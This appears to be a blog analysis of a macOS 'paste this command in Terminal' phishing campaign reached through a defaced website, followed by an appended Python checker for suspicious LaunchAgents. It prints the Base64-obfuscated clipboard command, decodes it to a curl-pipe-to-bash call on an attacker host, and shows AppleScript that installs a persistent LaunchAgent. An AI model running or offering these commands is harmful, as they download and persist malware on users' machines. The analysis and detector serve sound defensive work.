In this article I want to share an experience I had this weekend that I found interesting: a phishing attack aimed at macOS users. The main goal here is to show how malicious actors carry out attacks on users that would not even be caught by antivirus software or by Gatekeeper.
A website, whose name I will not disclose for security reasons, was attacked this weekend. The attack was a defacement that redirected the user via JavaScript to an external URL:
https://process-ahead04.b-cdn.net/processingtz.html
In the attack, the site induces the user to run a command on the local machine.
This site, in turn, claims its purpose is to "identify the user's credentials", so it asks the user to open the Terminal and press Command + V in it. When the user clicks Verify, what it actually does is save the following content to the machine's clipboard:
echo "Y3VybCAtcyAnaHR0cHM6Ly91bmlxdWVseWJsaW1wLmljdS9zY3JpcHQuc2gnIHwgYmFzaA==" | base64 -d | bash
Decoded, the Base64 string is:
curl -s 'https://uniquelyblimp.icu/script.sh' | bash
The command above downloads a self-executing script to the user's machine and pipes the output of that download into Bash, a shell that ships with macOS, so the script that was just downloaded runs on the user's machine.
The downloaded content looks something like this:

As you can see, the content is "encrypted" with Base64, but it can easily be read using base64decode.
The most bizarre part is here: what the self-executing script basically does is install a LaunchAgent, which stays hidden on the user's machine inside Library and uses as its configuration file a plist at $HOME/Library/LaunchAgents/com.dvohdgzstrwqhvjz.plist.
do shell script "
SCRIPT_PATH=\"$HOME/Library/dvohdgzstrwqhvjz\";
mkdir -p \"$HOME/Library/LaunchAgents\";
cat > \"$HOME/Library/LaunchAgents/com.dvohdgzstrwqhvjz.plist\" <<END_PLIST
<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">
<plist version=\"1.0\">
<dict>
<key>Label</key>
<string>com.dvohdgzstrwqhvjz</string>
<key>KeepAlive</key>
<true/>
<key>RunAtLoad</key>
<true/>
<key>ProgramArguments</key>
<array>
<string>/bin/bash</string>
<string>-c</string>
<string>echo '[base64 payload missing from this copy]' | base64 -d | osascript</string>
</array>
</dict>
</plist>
END_PLIST
"
do shell script "launchctl unload ~/Library/LaunchAgents/com.dvohdgzstrwqhvjz.plist 2>/dev/null"
do shell script "launchctl load ~/Library/LaunchAgents/com.dvohdgzstrwqhvjz.plist"
The moral of the story is: never trust sites that redirect the user and ask them to run commands on the local machine for support or anything of the kind, even if they are from companies you know. Phishing attacks are becoming ever more daring, so adopt the premise of never trusting access requests from companies.
André Jaccon
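
A defensive check for the persistence described above, added here as an example and not part of the original article: it parses LaunchAgent plists and flags ProgramArguments that decode Base64 and pipe the result into an interpreter. The function names, the dummy payload and the com.example labels are assumptions made for illustration.

```python
import plistlib
import re
from pathlib import Path

# Encoded data decoded and piped into an interpreter, as in the plist above.
DECODE_PIPE = re.compile(
    r"base64\s+(?:-d|-D|--decode)\b[^|]*\|\s*(?:osascript|bash|sh|zsh)\b")
SHELLS = {"/bin/bash", "/bin/sh", "/bin/zsh"}

def audit_plist(data: bytes) -> list:
    """Return the reasons a LaunchAgent plist resembles the one shown above."""
    try:
        job = plistlib.loads(data)
    except Exception:
        return ["unparseable plist"]
    if not isinstance(job, dict):
        return ["root object is not a job dictionary"]
    args = [str(a) for a in job.get("ProgramArguments", [])]
    reasons = []
    if DECODE_PIPE.search(" ".join(args)):
        reasons.append("base64-decoded data piped to an interpreter")
    if args and args[0] in SHELLS and "-c" in args[1:]:
        reasons.append("inline shell command via -c")
    # Common in legitimate agents too, so only reported as supporting context.
    if reasons and job.get("RunAtLoad") is True and job.get("KeepAlive") is True:
        reasons.append("RunAtLoad and KeepAlive both set")
    return reasons

def audit_dir(directory: Path) -> dict:
    """Map each flagged plist file name in `directory` to its reasons."""
    found = {p.name: audit_plist(p.read_bytes()) for p in sorted(directory.glob("*.plist"))}
    return {name: why for name, why in found.items() if why}

# Constructed samples: SUSPECT mirrors the structure on this page with a dummy
# payload ("QUJD"); BENIGN is a made-up ordinary agent.
TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>{label}</string>
<key>RunAtLoad</key><true/><key>KeepAlive</key><true/>
<key>ProgramArguments</key><array>{args}</array>
</dict></plist>"""
SUSPECT = TEMPLATE.format(label="com.example.constructed", args=
    "<string>/bin/bash</string><string>-c</string>"
    "<string>echo 'QUJD' | base64 -d | osascript</string>").encode()
BENIGN = TEMPLATE.format(label="com.example.updater", args=
    "<string>/Applications/Example.app/Contents/MacOS/updater</string>").encode()

if __name__ == "__main__":
    print(audit_dir(Path.home() / "Library" / "LaunchAgents"))
```

An empty result only means no agent matched these specific patterns; any flagged file should be read by hand before it is unloaded with launchctl and deleted.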